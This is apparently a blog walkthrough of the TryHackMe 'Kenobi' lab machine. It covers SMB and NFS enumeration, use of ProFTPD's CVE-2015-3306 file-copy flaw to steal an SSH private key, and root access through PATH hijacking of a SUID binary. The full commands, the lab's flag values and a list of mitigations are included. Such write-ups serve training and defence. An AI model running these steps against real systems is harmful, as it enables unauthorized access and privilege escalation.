Post

Kenobi

A comprehensive guide to exploiting Samba misconfigurations, ProFTPD vulnerabilities, and SUID binaries on a Linux machine.

Posted Updated
Preview Image
By Mustafa Eltayeb
3 min read
Kenobi

Kenobi - TryHackMe Writeup

Kenobi is an intermediate-level room that teaches exploitation of multiple services including Samba, ProFTPD, and NFS, culminating in privilege escalation through SUID binaries.

Difficulty: Medium ⭐⭐
Operating System: Linux (Ubuntu)
Themes: SMB Enumeration, FTP Exploitation, NFS Mounting, SUID Privilege Escalation

Objectives

  1. Enumerate SMB shares and extract sensitive information
  2. Exploit ProFTPD misconfiguration
  3. Mount NFS shares to access stolen files
  4. Escalate privileges using SUID binary misconfiguration

Reconnaissance

Initial Port Scan

Started with a comprehensive port scan:

1

nmap -p- --min-rate 10000 10.10.23.89

Results:

1
2
3
4
5
6
7
8
9

PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
2049/tcp  open  nfs
[Various high ports open for RPC services]

Service Version Detection

Ran detailed service enumeration:

1

nmap -p 21,22,80,111,139,445 -sCV 10.10.23.89

Key Findings:

  • Port 21: ProFTPD 1.3.5
  • Port 22: OpenSSH 7.2p2
  • Port 80: Apache 2.4.18 with /admin.html in robots.txt
  • Port 111: rpcbind service
  • Ports 139/445: Samba 4.3.11-Ubuntu

SMB Enumeration

Discovering SMB Shares

1

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.194.61

Discovered Shares:

1
2
3
4

\\10.10.23.89\anonymous
Type: STYPE_DISKTREE
Path: C:\home\kenobi\share
Anonymous access: READ/WRITE

Accessing SMB Share

Connected to the anonymous share:

1

smbclient //10.10.23.89/anonymous

Files Found:

  • log.txt - Contains sensitive information including SSH private key path

Extracted Information:

  • SSH private key location: /home/kenobi/.ssh/id_rsa

NFS Enumeration

Discovering NFS Exports

1

nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.23.89

Results:

1

NFS Export: /var *

The /var directory is shared via NFS with world-readable permissions.

ProFTPD Exploitation

FTP Service Analysis

ProFTPD 1.3.5 has a known vulnerability (CVE-2015-3306) that allows arbitrary file copy using the SITE CPFR and SITE CPTO commands.

Exploiting the Vulnerability

Connected to FTP service and copied the SSH private key:

1
2
3
4
5
6
7
8

telnet 10.10.23.89 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.23.89]

SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name

SITE CPTO /var/tmp/id_rsa
250 Copy successful

Accessing the Copied File

Mounted the NFS share to access the copied SSH key:

1

sudo mount -t nfs 10.10.23.89:/var /mnt

Located the SSH private key:

1
2

ls /mnt/tmp/
id_rsa

SSH Access

Used the stolen SSH key to gain access:

1

sudo ssh -i /mnt/tmp/id_rsa kenobi@10.10.23.89

Initial Access Obtained:

1
2
3
4
5

kenobi@kenobi:~$ whoami
kenobi

kenobi@kenobi:~$ cat user.txt
d0b0f3f53b6caa532a83915e19224899

User flag captured!

Privilege Escalation

SUID Enumeration

Looked for SUID binaries:

1

find / -type f -perm -u=s 2>/dev/null

Interesting Finding:

1

/usr/bin/menu

Analyzing the SUID Binary

Running the binary reveals its functionality:

1
2
3
4
5
6
7

kenobi@kenobi:~$ /usr/bin/menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :

Path Hijacking Exploitation

The binary likely uses relative paths without absolute paths. We can exploit this through PATH environment variable manipulation.

  1. Create malicious curl binary:
    1
2

    echo "/bin/bash" > /tmp/curl
chmod +x /tmp/curl
  2. Modify PATH environment variable:
    1

    export PATH=/tmp:$PATH
  3. Execute the SUID binary:
    1

    /usr/bin/menu
  4. Select option 1 (status check):
    1

    ** Enter your choice :1

Root Access Obtained

1
2
3
4
5

root@kenobi:/tmp# whoami
root

root@kenobi:/tmp# id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)

Root Flag Capture

1
2

root@kenobi:/# cat /root/root.txt
177b3cd8562289f37382721c28381f02

Root flag captured!

Key Takeaways

Attack Path Summary:

1
2
3

Port Scanning → SMB Enumeration → Information Disclosure → 
ProFTPD Exploitation → NFS Mounting → SSH Access → 
SUID Enumeration → Path Hijacking → Root Access

Vulnerabilities Exploited:

  1. SMB Misconfiguration - Anonymous read/write access to shares
  2. ProFTPD Vulnerability - Arbitrary file copy (CVE-2015-3306)
  3. NFS Misconfiguration - World-readable /var export
  4. SUID Binary Weakness - Relative path usage without validation
  5. PATH Environment Manipulation - Lack of absolute paths in SUID binary

Mitigation Strategies:

  1. For SMB:
    • Disable anonymous access
    • Implement proper share permissions
    • Regular security audits
  2. For ProFTPD:
    • Update to latest version
    • Restrict FTP commands
    • Implement chroot environments
  3. For NFS:
    • Restrict exports to specific IPs
    • Use read-only permissions where possible
    • Implement NFSv4 with Kerberos
  4. For SUID Binaries:
    • Use absolute paths in scripts
    • Regular SUID binary audits
    • Principle of least privilege
    • Consider capabilities instead of SUID where possible

Tools Used:

  • Nmap - Port scanning and service enumeration
  • smbclient - SMB share access
  • mount - NFS share mounting
  • SSH - Remote access with stolen key
  • Path manipulation - SUID exploitation

Find me online:
• TryHackMe: t4t4r1s
• LinkedIn: Mustafa Altayeb
• X: @mustafa_altayeb

tryhackme
TryHackMe SMB ProFTPD NFS SUID Privilege Escalation Linux
This post is licensed under CC BY 4.0 by the author.